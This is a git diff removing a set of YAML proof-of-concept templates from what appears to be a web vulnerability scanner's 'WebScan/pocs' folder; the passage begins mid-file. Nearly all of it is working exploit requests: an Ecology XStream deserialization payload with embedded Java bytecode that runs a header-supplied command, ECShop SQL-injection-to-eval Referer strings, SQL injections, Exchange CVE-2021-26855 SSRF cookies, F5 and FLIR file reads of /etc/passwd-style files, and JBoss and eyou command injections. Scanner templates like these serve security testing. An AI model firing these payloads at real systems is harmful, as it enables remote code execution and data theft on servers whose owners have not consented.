/services%20/WorkflowServiceXml - headers: - Content-Type: text/xml - cmd: bin/bash -c 'expr {{rand1}} + {{rand2}}' - follow_redirects: false - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array> <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.body.bcontains(bytes(string(rand1 + rand2))) -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/ecology-workflowservicexml.yml deleted file mode 100644 index 1e0c50f..0000000 --- a/WebScan/pocs/ecology-workflowservicexml.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ecology-workflowservicexml -set: - rand1: randomInt(1000, 9999) - rand2: randomInt(1000, 9999) -rules: - - method: POST - path: /services%20/WorkflowServiceXml - follow_redirects: false - headers: - Content-Type: text/xml - cmd: type c:\\windows\\win.ini - body: | - <java.util.PriorityQueue serialization="custom"> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> <comparator class="org.apache.commons.beanutils.BeanComparator"> <property>outputProperties</property> <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/> </comparator> </default> <int>3</int> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom"> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <default> <__name>Pwnr</__name> <__bytecodes> <byte-array>yv66vgAAADQAjwoACgA/CQAiAEAKAEEAQgoAQQBDCABECgBFAEYIADUHAEcKAAgASAcASQoASgBLBwBMCAAuCgAMAE0KAAwATgcATwsAEABQBwBRCgBSAFMHAFQKABQAPwgAVQoAFABWCgAUAFcKAFIAWAoAWQBaCgASAFsIAFwKABIAXQoAEgBeCgBfAGAHAGEKACAAYgcAYwcAZAEABGpha3kBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAIkx5YW9zZXJpYWwvcGF5bG9hZHMvdXRpbC9UZXN0T2JqMTsBAAg8Y2xpbml0PgEAA2NtZAEAA3JlcAEAKExqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXNwb25zZTsBAANvdXQBABVMamF2YS9pby9QcmludFdyaXRlcjsBAAJzaQEAEUxqYXZhL2xhbmcvQ2xhc3M7AQARZ2V0Q29udGV4dFJlcXVlc3QBABpMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEAA3JlcQEAL0xjb20vY2F1Y2hvL3NlcnZlci9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdEltcGw7AQABZQEAFUxqYXZhL2xhbmcvRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHAGEBAApTb3VyY2VGaWxlAQANVGVzdE9iajEuamF2YQwAJgAnDAAkACUHAGUMAGYAZwwAaABpAQAsY29tLmNhdWNoby5zZXJ2ZXIuZGlzcGF0Y2guU2VydmxldEludm9jYXRpb24HAGoMAGsAbAEAD2phdmEvbGFuZy9DbGFzcwwAbQBuAQAQamF2YS9sYW5nL09iamVjdAcAbwwAcABxAQAtY29tL2NhdWNoby9zZXJ2ZXIvaHR0cC9IdHRwU2VydmxldFJlcXVlc3RJbXBsDAByAHMMAHQAdQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlDAB2AHcBABFqYXZhL3V0aWwvU2Nhbm5lcgcAeAwAeQB6AQAXamF2YS9sYW5nL1N0cmluZ0J1aWxkZXIBAAdjbWQgL2MgDAB7AHwMAH0AfgwAfwCABwCBDACCAIMMACYAhAEAAlxBDACFAIYMAIcAfgcAiAwAiQCKAQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAiwAnAQAgeWFvc2VyaWFsL3BheWxvYWRzL3V0aWwvVGVzdE9iajEBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAEGphdmEvbGFuZy9UaHJlYWQBAA1jdXJyZW50VGhyZWFkAQAUKClMamF2YS9sYW5nL1RocmVhZDsBABVnZXRDb250ZXh0Q2xhc3NMb2FkZXIBABkoKUxqYXZhL2xhbmcvQ2xhc3NMb2FkZXI7AQAVamF2YS9sYW5nL0NsYXNzTG9hZGVyAQAJbG9hZENsYXNzAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsBABhqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2QBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAEmdldFNlcnZsZXRSZXNwb25zZQEAISgpTGphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlOwEACWdldFdyaXRlcgEAFygpTGphdmEvaW8vUHJpbnRXcml0ZXI7AQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAARuZXh0AQATamF2YS9pby9QcmludFdyaXRlcgEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAA9wcmludFN0YWNrVHJhY2UBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwCMCgCNAD8AIQAiAI0AAQAjAAEACgAkACUAAAACAAEAJgAnAAEAKAAAAC8AAQABAAAABSq3AI6xAAAAAgApAAAABgABAAAABwAqAAAADAABAAAABQArACwAAAAIAC0AJwABACgAAAE5AAYABgAAAIMBswACuAADtgAEEgW2AAZLKhIHA70ACLYACUwrAQO9AAq2AAvAAAxNLBINtgAOxgBMLBINtgAOTiy2AA/AABA6BBkEuQARAQA6BRkFuwASWbgAE7sAFFm3ABUSFrYAFy22ABe2ABi2ABm2ABq3ABsSHLYAHbYAHrYAH6cACEsqtgAhsQABAAQAegB9ACAAAwApAAAAPgAPAAAACQAEAA0AEAAOABsADwAoABAAMQARADgAEgBBABMASgAUAHEAFQB3ABQAegAZAH0AFwB+ABgAggAaACoAAABIAAcAOABCAC4AJQADAEEAOQAvADAABABKADAAMQAyAAUAEABqADMANAAAABsAXwA1ADYAAQAoAFIANwA4AAIAfgAEADkAOgAAADsAAAAKAAP7AHpCBwA8BAABAD0AAAACAD4=</byte-array> <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array> </__bytecodes> <__transletIndex>-1</__transletIndex> <__indentNumber>0</__indentNumber> </default> <boolean>false</boolean> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl> <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/> </java.util.PriorityQueue> </java.util.PriorityQueue> 2 - expression: | - response.status == 500 && response.headers["Set-Cookie"].contains("ecology") && response.body.bcontains(b"for 16-bit app support") -detail: - author: tangshoupu - info: ecology-workflowservicexml-rce - links: - - https://www.anquanke.com/post/id/239865 \ No newline at end of file diff --git a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml b/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml deleted file mode 100644 index 0b7721c..0000000 --- a/WebScan/pocs/ecshop-cnvd-2020-58823-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-ecshop-cnvd-2020-58823-sqli -set: - r1: randomInt(40000, 44800) -rules: - - method: POST - path: /delete_cart_goods.php - body: id=0||(updatexml(1,concat(0x7e,(select%20md5({{r1}})),0x7e),1)) - expression: | - response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://mp.weixin.qq.com/s/1t0uglZNoZERMQpXVVjIPw \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce.yml b/WebScan/pocs/ecshop-rce.yml deleted file mode 100644 index bb9151c..0000000 --- a/WebScan/pocs/ecshop-rce.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/ecshop-rce2.yml b/WebScan/pocs/ecshop-rce2.yml deleted file mode 100644 index c79f02c..0000000 --- a/WebScan/pocs/ecshop-rce2.yml +++ /dev/null @@ -1,17 +0,0 @@ -name: poc-yaml-ecshop-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: POST - path: /user.php - headers: - Referer: >- - 45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:"num";s:193:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243676b5831425055315262634841784d6a4e644b54733d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}45ea207d7a2b68c49582d2d22adf953aads - Content-Type: application/x-www-form-urlencoded - body: action=login&pp123=printf({{r1}}*{{r2}}); - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: 凉风(http://webkiller.cn/) - links: - - https://github.com/vulhub/vulhub/blob/master/ecshop/xianzhi-2017-02-82239600/README.zh-cn.md \ No newline at end of file diff --git a/WebScan/pocs/elasticsearch-unauth.yml b/WebScan/pocs/elasticsearch-unauth.yml deleted file mode 100644 index 18b7cd1..0000000 --- a/WebScan/pocs/elasticsearch-unauth.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-elasticsearch-unauth -rules: - - method: GET - path: / - follow_redirects: false - expression: | - response.status == 200 && response.content_type.contains("application/json") && response.body.bcontains(b"You Know, for Search") - - method: GET - path: /_cat - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"/_cat/master") -detail: - author: p0wd3r - links: - - https://yq.aliyun.com/articles/616757 diff --git a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml b/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml deleted file mode 100644 index 97a1da6..0000000 --- a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-exchange-cve-2021-26855-ssrf -rules: - - method: GET - path: /owa/auth/x.js - headers: - Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3; - follow_redirects: false - expression: | - "X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost") -detail: - author: sharecast - Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010" - links: - - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse \ No newline at end of file diff --git a/WebScan/pocs/eyou-rce.yml b/WebScan/pocs/eyou-rce.yml deleted file mode 100644 index 3e6bfcc..0000000 --- a/WebScan/pocs/eyou-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-eyou-rce -set: - r1: randomInt(800000000, 1000000000) - r2: randomInt(800000000, 1000000000) -rules: - - method: POST - path: /webadm/?q=moni_detail.do&action=gragh - headers: - Content-Type: application/x-www-form-urlencoded - body: type='|expr {{r1}} + {{r2}}||' - expression: response.body.bcontains(bytes(string(r1 + r2))) -detail: - author: jingling(https://github.com/shmilylty) - links: - - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g \ No newline at end of file diff --git a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml b/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml deleted file mode 100644 index 100a2ad..0000000 --- a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-f5-tmui-cve-2020-5902-rce -rules: - - method: POST - path: >- - /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp - headers: - Content-Type: application/x-www-form-urlencoded - body: fileName=%2Fetc%2Ff5-release - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(b"BIG-IP release") -detail: - author: Jing Ling - links: - - https://support.f5.com/csp/article/K52145254 - - https://github.com/rapid7/metasploit-framework/pull/13807/files diff --git a/WebScan/pocs/fangweicms-sqli.yml b/WebScan/pocs/fangweicms-sqli.yml deleted file mode 100644 index a9df0f1..0000000 --- a/WebScan/pocs/fangweicms-sqli.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-fangweicms-sqli -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23 - expression: | - response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: Rexus - Affected Version: "4.3" - links: - - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/ diff --git a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml b/WebScan/pocs/finereport-v8-arbitrary-file-read.yml deleted file mode 100644 index 7cd9f41..0000000 --- a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-finereport-v8-arbitrary-file-read -rules: - - method: GET - path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA") -detail: - author: Facker007(https://github.com/Facker007) - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8 diff --git a/WebScan/pocs/flir-ax8-file-read.yml b/WebScan/pocs/flir-ax8-file-read.yml deleted file mode 100644 index 6a77cc7..0000000 --- a/WebScan/pocs/flir-ax8-file-read.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-flir-ax8-file-read -rules: - - method: GET - path: "/download.php?file=/etc/passwd" - follow_redirects: false - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Print1n(http://print1n.top) - links: - - https://juejin.cn/post/6961370156484263972 \ No newline at end of file diff --git a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml b/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml deleted file mode 100644 index 8fe94ce..0000000 --- a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-gitlab-cnvd-2021-14193-infoleak -rules: - - method: POST - path: /api/graphql - headers: - Content-Type: application/json - body: >- - {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null} - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl")) -detail: - author: 说书人(http://python.vin/) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193 - - https://gitlab.com/gitlab-org/gitlab/-/issues/244275 \ No newline at end of file diff --git a/WebScan/pocs/h3c-secparh-any-user-login.yml b/WebScan/pocs/h3c-secparh-any-user-login.yml deleted file mode 100644 index d9f265f..0000000 --- a/WebScan/pocs/h3c-secparh-any-user-login.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-h3c-secparh-any-user-login -rules: - - method: GET - path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin" - expression: | - response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body)) -detail: - author: Print1n(https://print1n.top) - links: - - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E \ No newline at end of file diff --git a/WebScan/pocs/hikvision-cve-2017-7921.yml b/WebScan/pocs/hikvision-cve-2017-7921.yml deleted file mode 100644 index 78e8440..0000000 --- a/WebScan/pocs/hikvision-cve-2017-7921.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-hikvision-cve-2017-7921 -rules: - - method: GET - path: /system/deviceInfo?auth=YWRtaW46MTEK - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml" -detail: - author: whwlsfb(https://github.com/whwlsfb) - links: - - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html \ No newline at end of file diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml deleted file mode 100644 index de6c485..0000000 --- a/WebScan/pocs/iis6.0-put.yml +++ /dev/null @@ -1,21 +0,0 @@ -name: poc-yaml-iis-put-getshell -set: - filename: randomLowercase(6) - fileContent: randomLowercase(6) - -rules: - - method: PUT - path: /{{filename}}.txt - body: | - {{fileContent}} - expression: | - response.status == 201 - - method: GET - path: /{{filename}}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(fileContent)) -detail: - author: Cannae(github.com/thunderbarca) - links: - - https://www.cnblogs.com/-mo-/p/11295400.html \ No newline at end of file diff --git a/WebScan/pocs/jboss-cve-2010-1871.yml b/WebScan/pocs/jboss-cve-2010-1871.yml deleted file mode 100644 index c691a25..0000000 --- a/WebScan/pocs/jboss-cve-2010-1871.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-jboss-cve-2010-1871 -set: - r1: randomInt(8000000, 10000000) - r2: randomInt(8000000, 10000000) -rules: - - method: GET - path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d - follow_redirects: false - expression: | - response.status == 302 && response.headers["location"].contains(string(r1 * r2)) -detail: - author: fuping - links: - - 